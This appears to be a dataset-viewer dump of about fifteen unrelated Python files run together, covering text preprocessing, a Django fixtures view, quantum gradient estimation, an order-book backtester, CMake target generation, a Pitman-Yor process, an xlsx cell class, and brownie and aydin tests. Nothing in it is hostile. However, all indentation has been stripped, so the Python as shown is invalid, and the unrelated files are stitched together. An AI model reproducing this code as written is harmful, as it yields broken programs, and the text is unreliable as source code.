RAW_DATA = "../data/ptb/ptb.train.txt"
VOCAB = "data/ptb.vocab"
OUTPUT_DATA = "data/ptb.train"
# 读取词汇表并建立映射
with codecs.open(VOCAB, "r", "utf-8") as f_vocab:
vocab = [w.strip() for w in f_vocab.readlines()]
word_to_id = {k: v for (k, v) in zip(vocab, range(len(vocab)))}
# 如果出现了被删除的低频词,替换成 <unk>
def get_id(word):
return word_to_id[word] if word in word_to_id else word_to_id["<unk>"]
fin = codecs.open(RAW_DATA, "r", "utf-8")
fout = codecs.open(OUTPUT_DATA, 'w', 'utf-8')
for line in fin:
words = line.strip().split() + ["<eos>"] # 读取单词并添加 <eos> 结束符
# 将每个单词替换为词汇表中的编号
out_line = ' '.join([str(get_id(w)) for w in words]) + '\n'
fout.write(out_line)
fin.close()
fout.close()
|
31317
|
from utils import *
car = get_car()
# Positive cases. Can't print the result because the address may change
# from run to run.
#
dbgscript.search_memory(car['name'].address-16, 100, b'FooCar', 1)
dbgscript.search_memory(car['name'].address-16, 100, b'FooCar', 2)
# Negative cases.
#
# 4 is not a multiple of the pattern length.
#
try:
dbgscript.search_memory(car['name'].address-16, 100, b'FooCar', 4)
except ValueError:
print('Swallowed ValueError')
# Try a non-existent pattern.
#
try:
dbgscript.search_memory(car['name'].address-16, 100, b'AbcDefAb', 4)
except LookupError:
print('Swallowed LookupError')
# 3 is a multiple of the pat. len, but the pattern won't be found on a
# 3 byte granularity.
#
try:
dbgscript.search_memory(car['name'].address-16, 100, b'FooCar', 3)
except LookupError:
print('Swallowed LookupError')
|
31356
|
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.utils.functional import cached_property
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_noop, ugettext_lazy
from couchdbkit import ResourceNotFound
from memoized import memoized
from corehq.apps.fixtures.dispatcher import FixtureInterfaceDispatcher
from corehq.apps.fixtures.models import FixtureDataType, _id_from_doc
from corehq.apps.fixtures.views import FixtureViewMixIn, fixtures_home
from corehq.apps.reports.filters.base import BaseSingleOptionFilter
from corehq.apps.reports.generic import GenericReportView, GenericTabularReport
class FixtureInterface(FixtureViewMixIn, GenericReportView):
base_template = 'fixtures/fixtures_base.html'
asynchronous = False
dispatcher = FixtureInterfaceDispatcher
exportable = False
needs_filters = False
class FixtureSelectFilter(BaseSingleOptionFilter):
slug = "table_id"
label = ""
placeholder = "place"
default_text = ugettext_lazy("Select a Table")
@property
def selected(self):
# ko won't display default selected-value as it should, display default_text instead
return ""
@property
@memoized
def fixtures(self):
return sorted(FixtureDataType.by_domain(self.domain), key=lambda t: t.tag.lower())
@property
@memoized
def options(self):
return [(_id_from_doc(f), f.tag) for f in self.fixtures]
class FixtureViewInterface(GenericTabularReport, FixtureInterface):
name = ugettext_noop("View Tables")
slug = "view_lookup_tables"
report_template_path = 'fixtures/view_table.html'
fields = ['corehq.apps.fixtures.interface.FixtureSelectFilter']
@property
def view_response(self):
if not self.has_tables():
messages.info(self.request, _("You don't have any tables defined yet - create tables to view them."))
return HttpResponseRedirect(fixtures_home(self.domain))
else:
return super(FixtureViewInterface, self).view_response
@property
def report_context(self):
assert self.has_tables()
if not self.request.GET.get("table_id", None):
return {"table_not_selected": True}
try:
context = super(FixtureViewInterface, self).report_context
except ResourceNotFound:
return {"table_not_selected": True}
# Build javascript options for DataTables
report_table = context['report_table']
headers = report_table.get('headers')
data_tables_options = {
'slug': self.context['report']['slug'],
'defaultRows': report_table.get('default_rows', 10),
'startAtRowNum': report_table.get('start_at_row', 0),
'showAllRowsOption': report_table.get('show_all_rows'),
'autoWidth': headers.auto_width,
}
if headers.render_aoColumns:
data_tables_options.update({
'aoColumns': headers.render_aoColumns,
})
if headers.custom_sort:
data_tables_options.update({
'customSort': headers.custom_sort,
})
pagination = context['report_table'].get('pagination', {})
if pagination.get('is_on'):
data_tables_options.update({
'ajaxSource': pagination.get('source'),
'ajaxParams': pagination.get('params'),
})
left_col = context['report_table'].get('left_col', {})
if left_col.get('is_fixed'):
data_tables_options.update({
'fixColumns': True,
'fixColsNumLeft': left_col['fixed'].get('num'),
'fixColsWidth': left_col['fixed'].get('width'),
})
context.update({
"selected_table": self.table.get("table_id", ""),
'data_tables_options': data_tables_options,
})
if self.lookup_table:
context.update({
"table_description": self.lookup_table.description,
})
return context
@memoized
def has_tables(self):
return True if list(FixtureDataType.by_domain(self.domain)) else False
@property
@memoized
def table(self):
from corehq.apps.fixtures.views import data_table
if self.has_tables() and self.request.GET.get("table_id", None):
return data_table(self.request, self.domain)
else:
return {"headers": None, "rows": None}
@cached_property
def lookup_table(self):
if self.has_tables() and self.request.GET.get("table_id", None):
return FixtureDataType.get(self.request.GET['table_id'])
return None
@property
def headers(self):
return self.table["headers"]
@property
def rows(self):
return self.table["rows"]
class FixtureEditInterface(FixtureInterface):
name = ugettext_noop("Manage Tables")
slug = "edit_lookup_tables"
report_template_path = 'fixtures/manage_tables.html'
@property
def report_context(self):
context = super(FixtureEditInterface, self).report_context
context.update(types=self.data_types)
return context
@property
@memoized
def data_types(self):
return list(FixtureDataType.by_domain(self.domain))
|
31372
|
import NLQ_Preprocessor as preProcessor
import NLP_Engine as nlpEngine
import NLQ_Interpreter as interpreter
import nltk
import time
class NLQ_Chunker:
def __init__(self):
self.preprocessor = preProcessor.PreProcessor()
self.nlp_engine = nlpEngine.NLP_Engine()
self.interpreter = interpreter.Interpreter()
def chunk_a_sentence(self, sentence):
sentence = self.preprocessor.replace_special_words(sentence)['sentence']
# this method returns an object {'sentence': xxxx, 'origional_sentence': xxxx}
tokens = self.preprocessor.filter_tokens_result(nltk.word_tokenize(sentence))
tags = self.preprocessor.recify_tagging_result(nltk.pos_tag(tokens))
# get the bigram of the sentence, which tells subjects/objects from other elements
bigram = self.nlp_engine.bigram_chunk_sentence(tags)
final_gram = self.nlp_engine.top_pattern_recognizer(bigram) # the fully processed tree that contains all the info needed.
# final_gram.draw()
return self.interpreter.main_tree_navigator(final_gram)
#
#
#
#
#
# chunker = NLQ_Chunker()
# sentence = input('Ask: ')
# start = time.time()
# chunker.chunk_a_sentence(sentence)
# print('took ' , time.time() - start, 'seconds')
|
31427
|
import numpy as np
from pyquil import Program
from pyquil.api import QuantumComputer, get_qc
from grove.alpha.jordan_gradient.gradient_utils import (binary_float_to_decimal_float,
measurements_to_bf)
from grove.alpha.phaseestimation.phase_estimation import phase_estimation
def gradient_program(f_h: float, precision: int) -> Program:
"""
Gradient estimation via Jordan's algorithm (10.1103/PhysRevLett.95.050501).
:param f_h: Oracle output at perturbation h.
:param precision: Bit precision of gradient.
:return: Quil program to estimate gradient of f.
"""
# encode oracle values into phase
phase_factor = np.exp(1.0j * 2 * np.pi * abs(f_h))
U = np.array([[phase_factor, 0],
[0, phase_factor]])
p_gradient = phase_estimation(U, precision)
return p_gradient
def estimate_gradient(f_h: float, precision: int,
gradient_max: int = 1,
n_measurements: int = 50,
qc: QuantumComputer = None) -> float:
"""
Estimate the gradient using function evaluation at perturbation, h.
:param f_h: Oracle output at perturbation h.
:param precision: Bit precision of gradient.
:param gradient_max: OOM estimate of largest gradient value.
:param n_measurements: Number of times to measure system.
:param qc: The QuantumComputer object.
:return: Decimal estimate of gradient.
"""
# scale f_h by range of values gradient can take on
f_h *= 1. / gradient_max
# generate gradient program
perturbation_sign = np.sign(f_h)
p_gradient = gradient_program(f_h, precision)
# run gradient program
if qc is None:
qc = get_qc(f"{len(p_gradient.get_qubits())}q-qvm")
p_gradient.wrap_in_numshots_loop(n_measurements)
executable = qc.compiler.native_quil_to_executable(p_gradient)
measurements = qc.run(executable)
# summarize measurements
bf_estimate = perturbation_sign * measurements_to_bf(measurements)
bf_explicit = '{0:.16f}'.format(bf_estimate)
deci_estimate = binary_float_to_decimal_float(bf_explicit)
# rescale gradient
deci_estimate *= gradient_max
return deci_estimate
|
31428
|
from torch import randn
from torch.nn import Conv2d
from backpack import extend
def data_conv2d(device="cpu"):
N, Cin, Hin, Win = 100, 10, 32, 32
Cout, KernelH, KernelW = 25, 5, 5
X = randn(N, Cin, Hin, Win, requires_grad=True, device=device)
module = extend(Conv2d(Cin, Cout, (KernelH, KernelW))).to(device=device)
out = module(X)
Hout = Hin - (KernelH - 1)
Wout = Win - (KernelW - 1)
vin = randn(N, Cout, Hout, Wout, device=device)
vout = randn(N, Cin, Hin, Win, device=device)
return {
"X": X,
"module": module,
"output": out,
"vout_ag": vout,
"vout_bp": vout.view(N, -1, 1),
"vin_ag": vin,
"vin_bp": vin.view(N, -1, 1),
}
|
31460
|
import os
import json
from contextlib import suppress
from OrderBook import *
from Signal import Signal
class OrderBookContainer:
def __init__(self, path_to_file):
self.order_books = []
self.trades = []
self.cur_directory = os.path.dirname(path_to_file)
self.f_name = os.path.split(path_to_file)[1]
with open(path_to_file, 'r') as infile:
for line in infile:
ob = json.loads(line)
self.order_books.append(OrderBook(ob))
def create_training_dataset(self):
if not self.order_books:
return
output_dir = os.path.join(self.cur_directory, 'Datasets')
with suppress(OSError):
os.mkdir(output_dir)
dataset_file_path = os.path.splitext(os.path.join(output_dir, self.f_name))[0] + '.ds'
best_prices = self.order_books[0].best_prices
mid_price = (best_prices['buy_price'] + best_prices['sell_price']) / 2
with open(dataset_file_path, 'w') as json_file:
for idx, ob in enumerate(self.order_books[0:-1]):
next_best_prices = self.order_books[idx + 1].best_prices
next_mid_price = (next_best_prices['buy_price'] + next_best_prices['sell_price']) / 2
if mid_price != next_mid_price:
direction = 0 if mid_price > next_mid_price else 1
json.dump({'volumes': ob.volumes, 'direction': direction}, json_file)
json_file.write('\n')
mid_price = next_mid_price
def _open_position(self, best_prices, signal):
self.trades.append({})
self.trades[-1]['direction'] = signal
self.trades[-1]['open_time'] = best_prices['time'];
if signal == Signal.BUY:
self.trades[-1]['open_price'] = best_prices['buy_price'];
elif signal == Signal.SELL:
self.trades[-1]['open_price'] = best_prices['sell_price'];
def _close_position(self, best_prices):
self.trades[-1]['close_time'] = best_prices['time'];
if self.trades[-1]['direction'] == Signal.BUY:
self.trades[-1]['close_price'] = best_prices['sell_price'];
elif self.trades[-1]['direction'] == Signal.SELL:
self.trades[-1]['close_price'] = best_prices['buy_price'];
def _reverse_position(self, best_prices, signal):
self._close_position(best_prices)
self._open_position(best_prices, signal)
def backtest(self, generator, threshold):
self.trades = []
for ob in self.order_books[0:-1]:
best_prices = ob.best_prices
signal = generator(ob.volumes, threshold)
if not self.trades and signal != Signal.WAIT:
self._open_position(best_prices, signal)
elif signal != self.trades[-1]['direction'] and signal != Signal.WAIT:
self._reverse_position(best_prices, signal)
if not self.trades:
best_prices = self.order_books[-1].best_prices
self._close_position(best_prices)
return self.trades
def backtest_n(self, generator, ffnn, threshold):
self.trades = []
for ob in self.order_books[0:-1]:
best_prices = ob.best_prices
signal = generator(ffnn, ob.volumes, threshold)
if not self.trades and signal != Signal.WAIT:
self._open_position(best_prices, signal)
elif signal != self.trades[-1]['direction'] and signal != Signal.WAIT:
self._reverse_position(best_prices, signal)
if not self.trades:
best_prices = self.order_books[-1].best_prices
self._close_position(best_prices)
return self.trades
|
31467
|
import os
from biicode.common.model.brl.block_cell_name import BlockCellName
from biicode.common.model.bii_type import BiiType
def _binary_name(name):
return os.path.splitext(name.replace("/", "_"))[0]
class CPPTarget(object):
def __init__(self):
self.files = set() # The source files in this target
self.dep_targets = set() # set of BlockNames, to which this target depends
self.system = set() # These are the included system headers (stdio.h, math.h...)
self.include_paths = {} # Initially {Order#: BlockNamePath}. At the end [FullPaths]
@property
def dep_names(self):
return sorted([_binary_name(d) for d in self.dep_targets])
class CPPLibTarget(CPPTarget):
template = """
# LIBRARY {library_name} ##################################
# with interface {library_name}_interface
# Source code files of the library
SET(BII_LIB_SRC {files})
# STATIC by default if empty, or SHARED
SET(BII_LIB_TYPE {type})
# Dependencies to other libraries (user2_block2, user3_blockX)
SET(BII_LIB_DEPS {library_name}_interface {deps})
# System included headers
SET(BII_LIB_SYSTEM_HEADERS {system})
# Required include paths
SET(BII_LIB_INCLUDE_PATHS {paths})
"""
def __init__(self, block_name):
CPPTarget.__init__(self)
self.name = _binary_name(block_name)
self.type = "" # By default, libs are static
def dumps(self):
content = CPPLibTarget.template.format(library_name=self.name,
files="\n\t\t\t".join(sorted(self.files)),
type=self.type,
deps=" ".join(self.dep_names),
system=" ".join(sorted(self.system)),
paths="\n\t\t\t\t\t".join(self.include_paths))
return content
class CPPExeTarget(CPPTarget):
template = """
# EXECUTABLE {exe_name} ##################################
SET(BII_{exe_name}_SRC {files})
SET(BII_{exe_name}_DEPS {block_interface} {deps})
# System included headers
SET(BII_{exe_name}_SYSTEM_HEADERS {system})
# Required include paths
SET(BII_{exe_name}_INCLUDE_PATHS {paths})
"""
def __init__(self, main):
CPPTarget.__init__(self)
assert isinstance(main, BlockCellName)
assert not BiiType.isCppHeader(main.extension)
self.main = main
self.files.add(main.cell_name)
self.name = _binary_name(main)
self.block_interface = _binary_name(main.block_name) + "_interface"
self.simple_name = _binary_name(main.cell_name)
def dumps(self):
content = CPPExeTarget.template.format(block_interface=self.block_interface,
exe_name=self.simple_name,
files="\n\t\t\t".join(sorted(self.files)),
deps=" ".join(self.dep_names),
system=" ".join(sorted(self.system)),
paths="\n\t\t\t\t\t".join(self.include_paths))
return content
class CPPBlockTargets(object):
""" All the targets defined in a given block:
- 1 Lib
- N Exes
- There is always an Interface Lib per block, but no parametrization required here
"""
def __init__(self, block_name):
self.block_name = block_name
self.is_dep = False # To indicate if lives in deps or blocks folder
self.data = set()
self.lib = CPPLibTarget(block_name)
self.exes = [] # Of CPPExeTargets
self.tests = set() # Of CPPExeTargets
@property
def filename(self):
return "bii_%s_vars.cmake" % _binary_name(self.block_name)
def dumps(self):
exe_list = """# Executables to be created
SET(BII_BLOCK_EXES {executables})
SET(BII_BLOCK_TESTS {tests})
"""
vars_content = ["# Automatically generated file, do not edit\n"
"SET(BII_IS_DEP %s)\n" % self.is_dep]
vars_content.append(self.lib.dumps())
exes = [t.simple_name for t in self.exes]
tests = [t.simple_name for t in self.tests]
exes_list = exe_list.format(executables="\n\t\t\t".join(sorted(exes)),
tests="\n\t\t\t".join(sorted(tests)))
vars_content.append(exes_list)
for exe in self.exes:
content = exe.dumps()
vars_content.append(content)
return "\n".join(vars_content)
|
31490
|
from ._base import BaseWeight
from ..exceptions import NotFittedError
from ..utils.functions import mean_log_beta
import numpy as np
from scipy.special import loggamma
class PitmanYorProcess(BaseWeight):
def __init__(self, pyd=0, alpha=1, truncation_length=-1, rng=None):
super().__init__(rng=rng)
assert -pyd < alpha, "alpha param must be greater than -pyd"
self.pyd = pyd
self.alpha = alpha
self.v = np.array([], dtype=np.float64)
self.truncation_length = truncation_length
def random(self, size=None):
if size is None and len(self.d) == 0:
raise ValueError("Weight structure not fitted and `n` not passed.")
if size is not None:
if type(size) is not int:
raise TypeError("size parameter must be integer or None")
if len(self.d) == 0:
pitman_yor_bias = np.arange(size)
self.v = self.rng.beta(a=1 - self.pyd,
b=self.alpha + pitman_yor_bias * self.pyd,
size=size)
self.w = self.v * np.cumprod(np.concatenate(([1],
1 - self.v[:-1])))
else:
a_c = np.bincount(self.d)
b_c = np.concatenate((np.cumsum(a_c[::-1])[-2::-1], [0]))
if size is not None and size < len(a_c):
a_c = a_c[:size]
b_c = b_c[:size]
pitman_yor_bias = np.arange(len(a_c))
self.v = self.rng.beta(
a=1 - self.pyd + a_c,
b=self.alpha + pitman_yor_bias * self.pyd + b_c
)
self.w = self.v * np.cumprod(np.concatenate(([1],
1 - self.v[:-1])))
if size is not None:
self.complete(size)
return self.w
def complete(self, size):
if type(size) is not int:
raise TypeError("size parameter must be integer or None")
if self.get_size() < size:
pitman_yor_bias = np.arange(self.get_size(), size)
self.v = np.concatenate(
(
self.v,
self.rng.beta(a=1 - self.pyd,
b=self.alpha + pitman_yor_bias * self.pyd)
)
)
self.w = self.v * np.cumprod(np.concatenate(([1],
1 - self.v[:-1])))
return self.w
def fit_variational(self, variational_d):
self.variational_d = variational_d
self.variational_k = len(self.variational_d)
self.variational_params = np.empty((self.variational_k, 2),
dtype=np.float64)
a_c = np.sum(self.variational_d, 1)
b_c = np.concatenate((np.cumsum(a_c[::-1])[-2::-1], [0]))
self.variational_params[:, 0] = 1 - self.pyd + a_c
self.variational_params[:, 1] = self.alpha + (
1 + np.arange(self.variational_params.shape[0])
) * self.pyd + b_c
def variational_mean_log_w_j(self, j):
if self.variational_d is None:
raise NotFittedError
res = 0
for jj in range(j):
res += mean_log_beta(self.variational_params[jj][1],
self.variational_params[jj][0])
res += mean_log_beta(self.variational_params[j, 0],
self.variational_params[j, 1]
)
return res
def variational_mean_log_p_d__w(self, variational_d=None):
if variational_d is None:
_variational_d = self.variational_d
if _variational_d is None:
raise NotFittedError
else:
_variational_d = variational_d
res = 0
for j, nj in enumerate(np.sum(_variational_d, 1)):
res += nj * self.variational_mean_log_w_j(j)
return res
def variational_mean_log_p_w(self):
if self.variational_d is None:
raise NotFittedError
res = 0
for j, params in enumerate(self.variational_params):
res += mean_log_beta(params[0], params[1]) * -self.pyd
res += mean_log_beta(params[1], params[0]) * (
self.alpha + (j + 1) * self.pyd - 1
)
res += loggamma(self.alpha + j * self.pyd + 1)
res -= loggamma(self.alpha + (j + 1) * self.pyd + 1)
res -= loggamma(1 - self.pyd)
return res
def variational_mean_log_q_w(self):
if self.variational_d is None:
raise NotFittedError
res = 0
for params in self.variational_params:
res += (params[0] - 1) * mean_log_beta(params[0], params[1])
res += (params[1] - 1) * mean_log_beta(params[1], params[0])
res += loggamma(params[0] + params[1])
res -= loggamma(params[0]) + loggamma(params[1])
return res
def variational_mean_w(self, j):
if j > self.variational_k:
return 0
res = 1
for jj in range(j):
res *= (self.variational_params[jj][1] /
self.variational_params[jj].sum())
res *= self.variational_params[j, 0] / self.variational_params[j].sum()
return res
def variational_mode_w(self, j):
if j > self.variational_k:
return 0
res = 1
for jj in range(j):
if self.variational_params[jj, 1] <= 1:
if self.variational_params[jj, 0] <= 1:
raise ValueError('multimodal distribution')
else:
return 0
elif self.variational_params[jj, 0] <= 1:
continue
res *= ((self.variational_params[jj, 1] - 1) /
(self.variational_params[jj].sum() - 2))
if self.variational_params[j, 0] <= 1:
if self.variational_params[j, 1] <= 1:
raise ValueError('multimodal distribution')
else:
return 0
elif self.variational_params[j, 1] <= 1:
return res
res *= ((self.variational_params[j, 0] - 1) /
(self.variational_params[j].sum() - 2))
return res
|
31528
|
import sys
if sys.version_info > (3,):
basestring = (str, bytes)
long = int
class DeprecatedCellMixin(object):
"""Deprecated Cell properties to preserve source compatibility with the 1.0.x releases."""
__slots__ = ()
@property
def r(self):
"""The row number of this cell.
.. deprecated:: 1.1.0
Use the ``row_num`` property instead.
"""
return self.row.num
@property
def c(self):
"""The column number of this cell.
.. deprecated:: 1.1.0
Use the ``col`` property instead.
"""
return self.col
@property
def v(self):
"""The value of this cell.
.. deprecated:: 1.1.0
Use the ``value`` or the typed ``*_value`` properties instead.
"""
return self.value
@property
def f(self):
"""The formula of this cell.
.. deprecated:: 1.1.0
Use the ``formula`` property instead.
"""
return self.formula
class Cell(DeprecatedCellMixin):
"""A cell in a worksheet.
Attributes:
row (Row): The containing row.
col (int): The column index for this cell.
value (mixed): The cell value.
formula (bytes): The formula PTG bytes.
style_id (int): The style index in the style table.
"""
__slots__ = ('row', 'col', 'value', 'formula', 'style_id')
def __init__(self, row, col, value=None, formula=None, style_id=None):
self.row = row
self.col = col
self.value = value
self.formula = formula
self.style_id = style_id
def __repr__(self):
return 'Cell(row={}, col={}, value={}, formula={}, style_id={})' \
.format(self.row, self.col, self.value, self.formula, self.style_id)
@property
def row_num(self):
"""The row number of this cell."""
return self.row.num
@property
def string_value(self):
"""The string value of this cell or None if not a string."""
if isinstance(self.value, basestring):
return self.value
@property
def numeric_value(self):
"""The numeric value of this cell or None if not a number."""
if isinstance(self.value, (int, long, float)):
return self.value
@property
def bool_value(self):
"""The boolean value of this cell or None if not a boolean."""
if isinstance(self.value, bool):
return self.value
@property
def date_value(self):
"""The date value of this cell or None if not a numeric cell."""
return self.row.sheet.workbook.convert_date(self.value)
@property
def is_date_formatted(self):
"""If this cell is formatted using a date-like format code."""
fmt = self.row.sheet.workbook.styles._get_format(self.style_id)
return fmt.is_date_format
|
31593
|
import numpy as np
import os
import os.path as path
from keras.applications import vgg16, inception_v3, resnet50, mobilenet
from keras.preprocessing.image import load_img
from keras.preprocessing.image import img_to_array
import kmri
base_path = path.dirname(path.realpath(__file__))
img_path = path.join(base_path, 'img')
## Load the VGG model
# model = vgg16.VGG16(weights='imagenet')
# normalize_pixels = True
## Load the MobileNet model
# model = mobilenet.MobileNet(weights='imagenet')
# normalize_pixels = True
## Load the ResNet50 model
model = resnet50.ResNet50(weights='imagenet')
normalize_pixels = False
def get_img(file_name):
image = load_img(path.join(img_path, file_name), target_size=(224, 224))
if normalize_pixels:
return img_to_array(image) / 256
else:
return img_to_array(image)
img_input = np.array([get_img(file_name) for file_name in os.listdir(img_path)])
kmri.visualize_model(model, img_input)
|
31597
|
import brownie
def test_set_minter_admin_only(accounts, token):
with brownie.reverts("dev: admin only"):
token.set_minter(accounts[2], {"from": accounts[1]})
def test_set_admin_admin_only(accounts, token):
with brownie.reverts("dev: admin only"):
token.set_admin(accounts[2], {"from": accounts[1]})
def test_set_name_admin_only(accounts, token):
with brownie.reverts("Only admin is allowed to change name"):
token.set_name("Foo Token", "FOO", {"from": accounts[1]})
def test_set_minter(accounts, token):
token.set_minter(accounts[1], {"from": accounts[0]})
assert token.minter() == accounts[1]
def test_set_admin(accounts, token):
token.set_admin(accounts[1], {"from": accounts[0]})
assert token.admin() == accounts[1]
def test_set_name(accounts, token):
token.set_name("Foo Token", "FOO", {"from": accounts[0]})
assert token.name() == "Foo Token"
assert token.symbol() == "FOO"
|
31602
|
import numpy
from scipy.ndimage import gaussian_filter
from skimage.data import binary_blobs
from skimage.util import random_noise
from aydin.it.transforms.fixedpattern import FixedPatternTransform
def add_patterned_noise(image, n):
image = image.copy()
image *= 1 + 0.1 * (numpy.random.rand(n, n) - 0.5)
image += 0.1 * numpy.random.rand(n, n)
# image += 0.1*numpy.random.rand(n)[]
image = random_noise(image, mode="gaussian", var=0.00001, seed=0)
image = random_noise(image, mode="s&p", amount=0.000001, seed=0)
return image
def test_fixed_pattern_real():
n = 128
image = binary_blobs(length=n, seed=1, n_dim=3, volume_fraction=0.01).astype(
numpy.float32
)
image = gaussian_filter(image, sigma=4)
noisy = add_patterned_noise(image, n).astype(numpy.float32)
bs = FixedPatternTransform(sigma=0)
preprocessed = bs.preprocess(noisy)
postprocessed = bs.postprocess(preprocessed)
# import napari
# with napari.gui_qt():
# viewer = napari.Viewer()
# viewer.add_image(image, name='image')
# viewer.add_image(noisy, name='noisy')
# viewer.add_image(preprocessed, name='preprocessed')
# viewer.add_image(postprocessed, name='postprocessed')
assert image.shape == postprocessed.shape
assert image.dtype == postprocessed.dtype
assert numpy.abs(preprocessed - image).mean() < 0.007
assert preprocessed.dtype == postprocessed.dtype
assert numpy.abs(postprocessed - noisy).mean() < 1e-8
# import napari
# with napari.gui_qt():
# viewer = napari.Viewer()
# viewer.add_image(image, name='image')
# viewer.add_image(noisy, name='noisy')
# viewer.add_image(corrected, name='corrected')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.